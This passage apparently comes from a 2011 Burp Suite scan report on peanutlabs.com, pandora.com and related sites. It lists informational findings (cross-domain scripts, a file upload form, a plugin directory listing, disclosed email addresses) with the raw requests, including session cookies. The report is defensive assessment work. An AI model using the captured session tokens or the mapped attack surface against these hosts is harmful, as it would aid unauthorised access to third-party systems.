Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;

Response

HTTP/1.1 404 Not Found
Date: Sun, 09 Jan 2011 03:09:56 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://www1.peanutlabs.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 09 Jan 2011 03:09:56 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40853

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Peanut Labs | Page not found</title>

<!-- ST
...[SNIP]...
<link rel='stylesheet' id='wp-pagenavi-css' href='http://www1.peanutlabs.com/wp-content/themes/showtime/pagenavi-css.css?ver=2.70' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=3.0.1'></script>
...[SNIP]...
<div class="widget_footer_content"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

17.144. http://www1.peanutlabs.com/wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/11/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.peanutlabs.com
Path:	/wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/11/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=3.0.1
http://widgets.twimg.com/j/2/widget.js

Request

GET /wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/11/ HTTP/1.1
Host: www1.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;

Response

HTTP/1.1 404 Not Found
Date: Sun, 09 Jan 2011 03:09:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://www1.peanutlabs.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 09 Jan 2011 03:10:01 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40853

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Peanut Labs | Page not found</title>

<!-- ST
...[SNIP]...
<link rel='stylesheet' id='wp-pagenavi-css' href='http://www1.peanutlabs.com/wp-content/themes/showtime/pagenavi-css.css?ver=2.70' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=3.0.1'></script>
...[SNIP]...
<div class="widget_footer_content"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

17.145. http://www1.peanutlabs.com/wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/2/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.peanutlabs.com
Path:	/wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/2/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=3.0.1
http://widgets.twimg.com/j/2/widget.js

Request

GET /wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/2/ HTTP/1.1
Host: www1.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;

Response

HTTP/1.1 404 Not Found
Date: Sun, 09 Jan 2011 03:08:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://www1.peanutlabs.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 09 Jan 2011 03:09:20 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40853

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Peanut Labs | Page not found</title>

<!-- ST
...[SNIP]...
<link rel='stylesheet' id='wp-pagenavi-css' href='http://www1.peanutlabs.com/wp-content/themes/showtime/pagenavi-css.css?ver=2.70' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=3.0.1'></script>
...[SNIP]...
<div class="widget_footer_content"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

17.146. http://www1.peanutlabs.com/wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/3/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.peanutlabs.com
Path:	/wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/3/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=3.0.1
http://widgets.twimg.com/j/2/widget.js

Request

GET /wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/3/ HTTP/1.1
Host: www1.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;

Response

HTTP/1.1 404 Not Found
Date: Sun, 09 Jan 2011 03:08:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://www1.peanutlabs.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 09 Jan 2011 03:09:50 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40853

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Peanut Labs | Page not found</title>

<!-- ST
...[SNIP]...
<link rel='stylesheet' id='wp-pagenavi-css' href='http://www1.peanutlabs.com/wp-content/themes/showtime/pagenavi-css.css?ver=2.70' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=3.0.1'></script>
...[SNIP]...
<div class="widget_footer_content"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

17.147. http://www1.peanutlabs.com/wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/4/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.peanutlabs.com
Path:	/wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/4/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=3.0.1
http://widgets.twimg.com/j/2/widget.js

Request

GET /wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/4/ HTTP/1.1
Host: www1.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;

Response

HTTP/1.1 404 Not Found
Date: Sun, 09 Jan 2011 03:09:29 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://www1.peanutlabs.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 09 Jan 2011 03:09:58 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40853

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Peanut Labs | Page not found</title>

<!-- ST
...[SNIP]...
<link rel='stylesheet' id='wp-pagenavi-css' href='http://www1.peanutlabs.com/wp-content/themes/showtime/pagenavi-css.css?ver=2.70' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=3.0.1'></script>
...[SNIP]...
<div class="widget_footer_content"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

17.148. http://www1.peanutlabs.com/wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/5/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.peanutlabs.com
Path:	/wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/5/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=3.0.1
http://widgets.twimg.com/j/2/widget.js

Request

GET /wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/5/ HTTP/1.1
Host: www1.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;

Response

18. File upload functionality previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://malsup.com
Path:	/jquery/form/

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://malsup.com/jquery/form/files.php

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:

File path traversal
Persistent cross-site scripting
Placing of other client-executable code into the domain
Transmission of viruses and other malware
Denial of service

You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Whether uploaded content can subsequently be downloaded via a URL within the application.
What Content-type and Content-disposition headers the application returns when the file's content is downloaded.
Whether it is possible to place executable HTML/JavaScript into the file, which executes when the file's contents are viewed.
Whether the application performs any filtering on the file extension or MIME type of the uploaded file.
Whether it is possible to construct a hybrid file containing both executable and non-executable content, to bypass any content filters - for example, a file containing both a GIF image and a Java archive (known as a GIFAR file).
What location is used to store uploaded content, and whether it is possible to supply a crafted filename to escape from this location.
Whether archive formats such as ZIP are unpacked by the application.
How the application handles attempts to upload very large files, or decompression bomb files.

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Use a server-generated filename if storing uploaded files on disk.
Inspect the content of uploaded files, and enforce a whitelist of accepted, non-executable content types. Additionally, enforce a blacklist of common executable formats, to hinder hybrid file attacks.
Enforce a whitelist of accepted, non-executable file extensions.
If uploaded files are downloaded by users, supply an accurate non-generic Content-type header, and also a Content-disposition header which specifies that browsers should handle the file as an attachment.
Enforce a size limit on uploaded files (for defense-in-depth, this can be implemented both within application code and in the web server's configuration.
Reject attempts to upload archive formats such as ZIP.

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19. Directory listing previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www1.peanutlabs.com
Path:	/wp-content/plugins/uBillboard/

Issue description

Directory listings do not necessarily constitute a security vulnerability. Any sensitive resources within your web root should be properly access-controlled in any case, and should not be accessible by an unauthorised party who happens to know the URL. Nevertheless, directory listings can aid an attacker by enabling them to quickly identify the resources at a given path, and proceed directly to analysing and attacking them.

Issue remediation

There is not usually any good reason to provide directory listings, and disabling them may place additional hurdles in the path of an attacker. This can normally be achieved in two ways:

Configure your web server to prevent directory listings for all paths beneath the web root;
Place into each directory a default file (such as index.htm) which the web server will display instead of returning a directory listing.

Request

GET /wp-content/plugins/uBillboard/ HTTP/1.1
Host: www1.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:10:38 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 2631
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /wp-content/plugins/uBillboard</title>
</head>
<body>
<h1>Index of /wp-content/plugins/uBillboard</h1>
<table
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/wp-content/plugins/">Parent Directory</a>
...[SNIP]...

20. Email addresses disclosed previous next
There are 92 instances of this issue:

http://blog.pandora.com/pandora/
http://blog.pandora.com/pandora/archives/2005/08/
http://blog.pandora.com/pandora/archives/2005/11/
http://blog.pandora.com/pandora/archives/2006/01/
http://blog.pandora.com/pandora/archives/2006/02/
http://blog.pandora.com/pandora/archives/2006/03/
http://blog.pandora.com/pandora/archives/2006/04/
http://blog.pandora.com/pandora/archives/2006/05/
http://blog.pandora.com/pandora/archives/2006/06/
http://blog.pandora.com/pandora/archives/2006/07/
http://blog.pandora.com/pandora/archives/2006/08/
http://blog.pandora.com/pandora/archives/2006/09/
http://blog.pandora.com/pandora/archives/2006/10/
http://blog.pandora.com/pandora/archives/2006/12/
http://blog.pandora.com/pandora/archives/2007/02/
http://blog.pandora.com/pandora/archives/2007/04/
http://blog.pandora.com/pandora/archives/2007/05/
http://blog.pandora.com/pandora/archives/2007/06/
http://blog.pandora.com/pandora/archives/2007/07/
http://blog.pandora.com/pandora/archives/2007/08/
http://blog.pandora.com/pandora/archives/2008/01/
http://blog.pandora.com/pandora/archives/2008/02/
http://blog.pandora.com/pandora/archives/2008/05/
http://blog.pandora.com/pandora/archives/2008/06/
http://blog.pandora.com/pandora/archives/2008/07/
http://blog.pandora.com/pandora/archives/2008/08/
http://blog.pandora.com/pandora/archives/2008/09/
http://blog.pandora.com/pandora/archives/2008/10/
http://blog.pandora.com/pandora/archives/2009/07/
http://blog.pandora.com/pandora/archives/2010/06/
http://blog.pandora.com/pandora/archives/2010/11/
http://blog.pandora.com/pandora/archives/2010/11/fantastic-fargo.html
http://blog.pandora.com/pandora/archives/2010/11/town-halls-this.html
http://blog.pandora.com/pandora/archives/arizona/
http://blog.pandora.com/pandora/archives/california/
http://blog.pandora.com/pandora/archives/colorado/
http://blog.pandora.com/pandora/archives/florida/
http://blog.pandora.com/pandora/archives/georgia/
http://blog.pandora.com/pandora/archives/illinois/
http://blog.pandora.com/pandora/archives/indiana/
http://blog.pandora.com/pandora/archives/massachusetts/
http://blog.pandora.com/pandora/archives/michigan/
http://blog.pandora.com/pandora/archives/minnesota/
http://blog.pandora.com/pandora/archives/missouri/
http://blog.pandora.com/pandora/archives/new-york/
http://blog.pandora.com/pandora/archives/north-carolina/
http://blog.pandora.com/pandora/archives/ohio/
http://blog.pandora.com/pandora/archives/oregon/
http://blog.pandora.com/pandora/archives/pennsylvania/
http://blog.pandora.com/pandora/archives/rhode-island/
http://blog.pandora.com/pandora/archives/roadtrip/
http://blog.pandora.com/pandora/archives/roadtrip/index.html
http://blog.pandora.com/pandora/archives/texas/
http://blog.pandora.com/pandora/archives/virginia/
http://blog.pandora.com/pandora/archives/washington-dc/
http://blog.pandora.com/pandora/archives/washington/
http://blog.pandora.com/pandora/index.xml
http://blog.pandora.com/pandora/jquery.dimension.js
http://board-games.pogo.com/v/ERWvfg/include/js/shared/markup2.js
http://card-games.pogo.com/v/ERWvfg/include/js/shared/markup2.js
http://dean.edwards.name/weblog/2006/06/again/
http://download-games.pogo.com/deluxe.aspx
http://jqueryui.com/about
http://www.adobe.com/aboutadobe/contact.html
http://www.adobe.com/aboutadobe/invrelations/
http://www.adobe.com/cfusion/marketplace/index.cfm
http://www.adobe.com/technology/
http://www.cmsinter.net/
http://www.cmsinter.net/blog/
http://www.ea.com/ipad
http://www.ea.com/iphone
http://www.ea.com/mobile
http://www.freshnews.com/news/388192/peanut-labs-inc-announces-acquisition-e-rewards-inc-
http://www.mlive.com/js/sitecatalyst/s_code.js
http://www.peanutlabs.com/core.php
http://www.peanutlabs.com/core.php
http://www.peanutlabs.com/media/case_studies.php
http://www.peanutlabs.com/media/company.php
http://www.peanutlabs.com/media/contact.php
http://www.peanutlabs.com/media/map.php
http://www.peanutlabs.com/media/privacy_policy.php
http://www.peanutlabs.com/media/publishers.php
http://www.peanutlabs.com/media/terms.php
http://www.peanutlabs.com/pl/privacyPolicy.php
http://www.peanutlabs.com/userGreeting.php
http://www.pogo.com/account/my-account/main.do
http://www.pogo.com/misc/advertise.jsp
http://www.pogo.com/prize/prize.do
http://www.pogo.com/v/ERWvfg/include/js/shared/markup2.js
http://www.pogo.com/v/ESf4UQ/js/lightreg.js
https://www.pogo.com/v/ERWvfg/include/js/shared/markup2.js
http://www.slidedeck.com/

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

20.1. http://blog.pandora.com/pandora/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:23:45 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Fri, 07 Jan 2011 22:35:26 GMT
ETag: "79e071-b926-499493c0d2780"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 47398

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
een (any recommendations you have about cool places to stop and stretch legs or get a cup of coffee or a great meal between Grand Forks and Sioux Falls or Sioux Falls and Omaha, please let us know at tour@pandora.com). The response from the local audience has been wonderful, although no one has yet offered to make sure there's no snow...</p>
...[SNIP]...
<p>So if you have friends you think might want to drop in, point them to the info below and ask them to email us at tour@pandora.com to RSVP. Not everyone on Pandora opts in to get emails so we always miss people that we wish we could reach. </p>
...[SNIP]...

20.2. http://blog.pandora.com/pandora/archives/2005/08/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2005/08/

Issue detail

The following email address was disclosed in the response:

pandora-support@pandora.com

Request

GET /pandora/archives/2005/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:06:01 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:26:15 GMT
ETag: "79e066-3a17-498819df317c0"
Accept-Ranges: bytes
Content-Length: 14871
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
month for all of us at Pandora has been the opportunity to interact with all of you. We want to have the same kind of relationship with all of our listeners. Please don't hesitate to send us an email (pandora-support@pandora.com) with your thoughts, feedback, ideas, and comments. We're still listening!</p>
...[SNIP]...

20.3. http://blog.pandora.com/pandora/archives/2005/11/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2005/11/

Issue detail

The following email address was disclosed in the response:

pandora-support@pandora.com

Request

GET /pandora/archives/2005/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:59 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:26:15 GMT
ETag: "79e05f-4714-498819df317c0"
Accept-Ranges: bytes
Content-Length: 18196
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<p>Over the course of the last 8 weeks we've been introduced to an incredible group of Pandora listeners from all over the world. Whether it's been here in the Pandora blog comments, via pandora-support@pandora.com, or out there in the blogosphere we've virtually "met" an amazing and passionate group of music lovers.</p>
...[SNIP]...

20.4. http://blog.pandora.com/pandora/archives/2006/01/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/01/

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

GET /pandora/archives/2006/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:58 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:26:14 GMT
ETag: "79e05c-60c9-498819de3d580"
Accept-Ranges: bytes
Content-Length: 24777
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...
<a href="mailto:tour@pandora.com ">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...

20.5. http://blog.pandora.com/pandora/archives/2006/02/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/02/

Issue detail

The following email addresses were disclosed in the response:

pandora-support@pandora.com
tour@pandora.com

Request

GET /pandora/archives/2006/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
